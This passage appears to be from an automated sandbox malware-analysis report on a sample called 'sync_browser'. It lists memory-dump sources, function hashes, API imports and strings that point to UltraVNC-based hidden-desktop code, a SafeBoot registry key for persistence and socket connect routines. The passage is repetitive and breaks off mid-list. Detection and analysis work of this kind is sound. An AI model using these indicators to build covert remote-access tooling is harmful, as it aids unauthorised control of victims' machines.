                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$FullNamePathfree$ErrorLast_invalid_parameter_noinfocalloc
                                                    • String ID:
                                                    • API String ID: 3219262609-0
                                                    • Opcode ID: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
                                                    • Instruction ID: 7389bda394e73b18e2748741462033d428455a810187bb9fbf3176105f7db92e
                                                    • Opcode Fuzzy Hash: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
                                                    • Instruction Fuzzy Hash: C431AD62E4D65287FA957A61640427DA294AF81F98FD84833ED5E47BCADF3CE4428330
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$AddressProc$Initialize$FileHandleLibraryLoadModule$CountCreateEnterErrorLastLeaveMappingOpenSemaphoreTickView
                                                    • String ID: ChangeWindowMessageFilter$GetCursorInfo$user32.dll
                                                    • API String ID: 173432231-678763868
                                                    • Opcode ID: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                    • Instruction ID: 7ae6f52fde503bcb71f16b2a15ea85e3f513124274727e11f79ecb0af977f587
                                                    • Opcode Fuzzy Hash: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                    • Instruction Fuzzy Hash: 1D411B32619B91A7E64CAB24E9406EDB7A8FF84B54FC04136DAAD03794DF7CA4B5C310
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: LANMANNT$LANSECNT$ProductType$SERVERNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                    • API String ID: 3677997916-356703426
                                                    • Opcode ID: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                    • Instruction ID: 8d8d158193c13090a439e25d802cd03a0bcd99910e3c6e50970922e84ca6c670
                                                    • Opcode Fuzzy Hash: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                    • Instruction Fuzzy Hash: 44414D32A1C64282FB60AB20E4447AEBAA4FF84B4CFC45032DE6D87559EF3CD515CB24
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: CurrentType$Multiprocessor Checked$Multiprocessor Free$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Uniprocessor Checked$Uniprocessor Free
                                                    • API String ID: 3677997916-1370392681
                                                    • Opcode ID: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
                                                    • Instruction ID: bca54bdfeb175371eb47ca96d49a61ab1afce13cc7fb8eeca5b1cf1409863b99
                                                    • Opcode Fuzzy Hash: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
                                                    • Instruction Fuzzy Hash: A5314171A18A4382FB50AB25E444BADB7A4FF85B4CFC01132DE9D4A599EF3CD505CB60
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Create$BitmapCompatibleDeleteErrorLastObjectSection
                                                    • String ID: vncdesktop.cpp : attempting to enable DIBsection blits$vncdesktop.cpp : enabled fast DIBsection blits OK$vncdesktop.cpp : enabled slow blits OK$vncdesktop.cpp : failed to build DIB section - reverting to slow blits$vncdesktop.cpp : failed to create memory bitmap(%d)
                                                    • API String ID: 554953491-3667255696
                                                    • Opcode ID: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
                                                    • Instruction ID: 398ef49a456a82d24992d8136198356efe3997d06d9f22551e115a89c84f8bfa
                                                    • Opcode Fuzzy Hash: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
                                                    • Instruction Fuzzy Hash: CF311625608A9686EB04EF64E4408ADBB60FF88F98FC84533DE4D47658DF3CE105C3A0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCreateValue_errno_invalid_parameter_noinfo_snprintf
                                                    • String ID: ?$Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$Service$uvnc_service
                                                    • API String ID: 913464532-2910635102
                                                    • Opcode ID: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
                                                    • Instruction ID: e871204b2416fc0759f74cf03df9e40785b9cd6a4ae4bf9db6917efff6ca1eb9
                                                    • Opcode Fuzzy Hash: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
                                                    • Instruction Fuzzy Hash: C2217171A18A8282EB60EB10F455B6EBBA0FBC5758FC00136EA8C07B68DF7DD105CB14
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7D59F5D15), ref: 00007FF7D59F5A72
                                                    • malloc.LIBCMT ref: 00007FF7D59F5ADB
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7D59F5D15), ref: 00007FF7D59F5B0F
                                                    • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7D59F5D15), ref: 00007FF7D59F5B36
                                                    • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7D59F5D15), ref: 00007FF7D59F5B7E
                                                    • malloc.LIBCMT ref: 00007FF7D59F5BDB
                                                      • Part of subcall function 00007FF7D59E8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7D59E8C64
                                                      • Part of subcall function 00007FF7D59E8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7D59F329C,?,?,?,00007FF7D59F7749,?,?,?,00007FF7D59F77F3), ref: 00007FF7D59E8C89
                                                      • Part of subcall function 00007FF7D59E8C34: _callnewh.LIBCMT ref: 00007FF7D59E8CA2
                                                      • Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CAD
                                                      • Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CB8
                                                    • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7D59F5D15), ref: 00007FF7D59F5C10
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7D59F5D15), ref: 00007FF7D59F5C50
                                                    • free.LIBCMT ref: 00007FF7D59F5C64
                                                    • free.LIBCMT ref: 00007FF7D59F5C75
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
                                                    • String ID:
                                                    • API String ID: 1080698880-0
                                                    • Opcode ID: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
                                                    • Instruction ID: c6a359ac6bac90bcaddda1a854330d01bef9db71262ff3a07de221e982c0db3c
                                                    • Opcode Fuzzy Hash: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
                                                    • Instruction Fuzzy Hash: AD819D32A0D78287EB24AF65988016DA6D5FB49FACFD44236EE2D43BD4DF38D5018720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$DesktopLeave$CloseCountEnterInputOpenRevertSelfTickTimetime
                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                    • API String ID: 2523754900-3977938048
                                                    • Opcode ID: 9a7525795177f4a570cef7dccf6c73ea45f8d1ba20e1ddabafe20dcd5e05a56b
                                                    • Instruction ID: 674a5c72bd457f18e55331fdfc08b25b8fd3834bb2601578750d4709e8cba0ee
                                                    • Opcode Fuzzy Hash: 9a7525795177f4a570cef7dccf6c73ea45f8d1ba20e1ddabafe20dcd5e05a56b
                                                    • Instruction Fuzzy Hash: E5B1D122A0869186F794EB25C4587FEABA1EB85F88FD84032DE4C477A5CF3CD455C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: inet_addr$connectgethostbynamehtonssocket
                                                    • String ID: 0123456789.
                                                    • API String ID: 478842821-2088042752
                                                    • Opcode ID: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
                                                    • Instruction ID: 4ac5cffd9407ee29169a584909d0298031913a4103ea45d2ba4b7491ff0c1b42
                                                    • Opcode Fuzzy Hash: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
                                                    • Instruction Fuzzy Hash: 17416261619651C6EA24AF26E45007DA7A1FF88F98FC45232EE8D07799EF3CE542C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$ClassCombineCreateDeleteNameObjectWindowfree
                                                    • String ID: ConsoleWindowClass$tty
                                                    • API String ID: 490048385-1921057836
                                                    • Opcode ID: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
                                                    • Instruction ID: 18e4c7771e62e9750178cc5daa1c1c23ae1e9d0f89d72e0bb6e8287faa0ec760
                                                    • Opcode Fuzzy Hash: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
                                                    • Instruction Fuzzy Hash: 6C415E367086858BDB249B25E49066DB7A0FB89F94FC44136DE8E53B58DF3CE445CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$CursorEnterLeave$Rect
                                                    • String ID: ^
                                                    • API String ID: 2550375211-1590793086
                                                    • Opcode ID: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
                                                    • Instruction ID: 0fc858e5b3189b60669ed684630f2bc6441c87bea823ec7fbe1e4aea897dc98d
                                                    • Opcode Fuzzy Hash: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
                                                    • Instruction Fuzzy Hash: E6410A326186818BD728DF29E59466DB7A0FB88B94F904136EB5D03B54CF3CE465CB10
                                                    APIs
                                                    Strings
                                                    • HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x, xrefs: 00007FF7D593A738
                                                    • HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x), xrefs: 00007FF7D593A7AC
                                                    • HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x), xrefs: 00007FF7D593A726
                                                    • HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x, xrefs: 00007FF7D593A7E7
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorInfoLastParametersSystem
                                                    • String ID: HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x)$HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x$HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x
                                                    • API String ID: 2777246624-2146332292
                                                    • Opcode ID: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
                                                    • Instruction ID: 92a56d389a0abcae61aad3a3f4313cd3183afd26e563838496878db63fc2f6ac
                                                    • Opcode Fuzzy Hash: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
                                                    • Instruction Fuzzy Hash: 2F416C31E086928BE714EF64A840A69BB61FB84B88FC40137DD8E57A58DF3DE505C760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
